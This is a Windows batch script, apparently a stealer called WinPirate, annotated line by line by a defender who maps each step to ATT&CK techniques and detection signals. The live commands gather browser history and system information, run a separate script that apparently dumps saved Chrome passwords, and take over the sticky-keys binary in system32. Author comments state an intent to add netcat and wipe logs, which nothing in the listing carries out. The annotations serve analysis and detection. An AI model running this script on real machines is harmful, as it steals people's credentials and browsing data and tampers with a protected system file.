WinPirate.bat
@echo off
REM stealthily grabs passwords and browser history from windows systems, and drops a netcat?? undetectable by antivirus
REM NOTE(review): nothing in this listing drops netcat or evades antivirus. The lines near
REM the end that mention it are comments with no commands behind them.
REM Defender summary of the visible commands: create a Booty folder under the current
REM directory, run two bundled third-party collection tools plus systeminfo and a Python
REM script, merge the CSV output, then touch the sethc.exe accessibility binary.
REM Every tool and output path is relative, so the artefacts land wherever the script was
REM started from (presumably removable media - confirm during triage).
REM checking OS type
REM cmd variable names are case-insensitive, so TypeofOS and TypeOfOS are one variable.
REM The machine is treated as 64-bit when the directory named by the PROGRAMFILES(X86)
REM environment variable exists.
set TypeofOS=0
IF exist "%PROGRAMFILES(X86)%" (set TypeOfOS=64) ELSE (set TypeOfOS=32)
REM creating results directory
REM Forensic artefact: a folder named Booty in the working directory. mkdir reports an
REM error but the script carries on if the folder already exists.
mkdir Booty
REM getting browser history
REM Both branches run a BrowsingHistoryView binary with /scomma (save as comma-delimited
REM text) and write Booty\browserhistory.csv. Detection: process creation for
REM browsinghistoryview.exe or browsinghistoryview64.exe with /scomma on the command
REM line, and creation of that CSV (ATT&CK T1217).
IF %TypeofOS% EQU 64 (GOTO Bhistory64) ELSE (GOTO Bhistory32)
:Bhistory32
"Tools\Browsinghistoryview\browsinghistoryview.exe" /scomma "Booty\browserhistory.csv"
GOTO WINAUDIT
:Bhistory64
"Tools\Browsinghistoryview\browsinghistoryview\browsinghistoryview64.exe" /scomma "Booty\browserhistory.csv"
GOTO WINAUDIT
REM get computer program information to see if vulnerable
REM WinAudit is run with /r (the report sections to include) and /f (the output file).
REM The result is Booty\winaudit.html, a software and configuration inventory of the host.
:WINAUDIT
"Tools\winaudit\WinAudit.exe" /r=gsoPxuTUeERNtnzDaIbMpmidcSArCOHG /f="Booty\winaudit.html"
GOTO SYSTEMINFO
REM get system information
REM Built-in systeminfo in CSV format, redirected to Booty\systeminfo.csv (ATT&CK T1082).
REM There is no GOTO after it, so execution falls through into the CHROME label.
:SYSTEMINFO
systeminfo /FO CSV > "Booty\systeminfo.csv"
REM Chrome passwords
REM chromepasswords.py is not part of this listing. Presumably it reads Chrome saved
REM logins (ATT&CK T1555.003) - confirm against the script itself. Where it writes is not
REM visible here. Detection: python started from cmd with chromepasswords.py as argument.
:CHROME
python chromepasswords.py -csv
REM Create master password list
REM Appends every CSV currently in Booty to master_password_list.csv. From the lines above
REM that includes browserhistory.csv and systeminfo.csv, so the file holds more than
REM passwords. Treat it as sensitive evidence if recovered.
type Booty\*.csv >> Booty\master_password_list.csv
REM add nc without being detected by antivirus
REM remove all traces of activity
REM wipe the logs
REM NOTE(review): the three lines above are intentions only. No command in this listing
REM implements them, so the Booty folder and normal process and file telemetry remain.
REM put sticky keys back to normal
REM This implies an earlier step, not shown here, replaced sethc.exe and kept the original
REM as sethcold.exe. Swapping sethc.exe is the accessibility-features backdoor technique
REM (ATT&CK T1546.008). takeown or icacls aimed at system32\sethc.exe is a strong
REM detection signal on its own, as is any write to that file outside servicing.
REM NOTE(review): icacls is issued twice for sethc.exe and never for sethcold.exe, and the
REM ren commands name files without a directory, so whether system32 is really restored
REM depends on the working directory. Responders should verify sethc.exe against a
REM known-good signature rather than trust this cleanup.
takeown /f c:\windows\system32\sethc.exe
takeown /f c:\windows\system32\sethcold.exe
icacls c:\windows\system32\sethc.exe /grant %username%:F /q /t
icacls c:\windows\system32\sethc.exe /grant %username%:F /q /t
ren sethc.exe sethcbad.exe
ren sethcold.exe sethc.exe
REM pause keeps the console window open until a key is pressed.
pause
REM take out the pause before deploying